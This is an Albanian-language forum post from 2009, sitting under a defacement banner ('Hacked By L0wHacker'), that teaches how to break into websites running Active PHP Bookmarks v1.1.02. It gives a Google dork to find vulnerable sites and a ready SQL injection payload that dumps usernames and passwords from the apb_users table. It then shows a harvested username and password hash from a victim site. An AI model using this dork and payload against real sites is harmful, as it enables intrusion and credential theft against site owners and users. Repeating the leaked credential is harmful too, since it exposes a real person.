Hacked By L0wHacker

Hacked By L0wHacker
Hacked By L0wHacker

Hacked by L0wHacker


  Si ti hackojm webat e fuqizuar nga Active PHP bookmarks v1.1.02

  Share

  Si ti hackojm webat e fuqizuar nga Active PHP bookmarks v1.1.02

  Mesazh nga Caveman prej Fri May 15, 2009 5:46 am

  Si te hackojme Weba i fuqizuar nga : Active PHP Bookmarks v1.1.02

  --------------------------------------------------------------------------------

  Si te hackojme Web i fuqizuar nga :
  Active PHP Bookmarks v1.1.02

  Se pari shkojme ne Google

  Dhe shenojme ket Dork ne Google

  Dork :

  Kodi:
  inurl:bookmarks/view_group.php?id=

  Dhe ja shtoni ket Exploit

  Exploit :

  Kodi:
  view_group.php?id=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8+from+apb_users--

  Duhet te ja shtojme mbas Scriptit  Dhe ja ku e kam gjejt une njo :

  Active PHP Bookmarks

  User: Paul
  md5 : 273XeGvhbXl.g

   Ora është Thu Mar 22, 2018 2:03 am